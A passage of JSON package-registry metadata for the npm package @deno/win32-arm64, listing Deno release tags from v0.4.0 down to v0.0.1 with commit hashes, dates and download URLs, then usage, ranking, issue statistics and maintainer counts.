","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-28T14:40:31.848Z","dependent_packages_count":0,"downloads":8255,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":25.354594294144324,"dependent_packages_count":36.69686831981711,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":31.025731306980717},"purl":"pkg:npm/%40deno/win32-arm64","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@deno/win32-arm64","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@deno/win32-arm64","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@deno/win32-arm64/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-28T02:34:50.351Z","issues_count":6619,"pull_requests_count":9639,"avg_time_to_close_issue":17209143.875658587,"avg_time_to_close_pull_request":1533351.1008099688,"issues_closed_count":3794,"pull_requests_closed_count":8024,"pull_request_authors_count":580,"issue_authors_count":2470,"avg_comments_per_issue":2.509442513974921,"avg_comments_per_pull_request":0.719680464778504,"merged_pull_requests_count":7006,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":663,"past_year_pull_requests_count":1197,"past_year_avg_time_to_close_issue":1426984.6098654708,"past_year_avg_time_to_close_pull_request":1334468.010687023,"past_year_issues_closed_count":223,"past_year_pull_requests_closed_count":655,"past_year_pull_request_authors_count":184,"past_year_issue_authors_count":365,"past_year_avg_comments_per_issue":1.2428355957767723,"past_year_avg_comments_per_pull_request":1.1161236424394319,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":14,"past_year_merged_pull_requests_count":483,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1795,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":283,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.e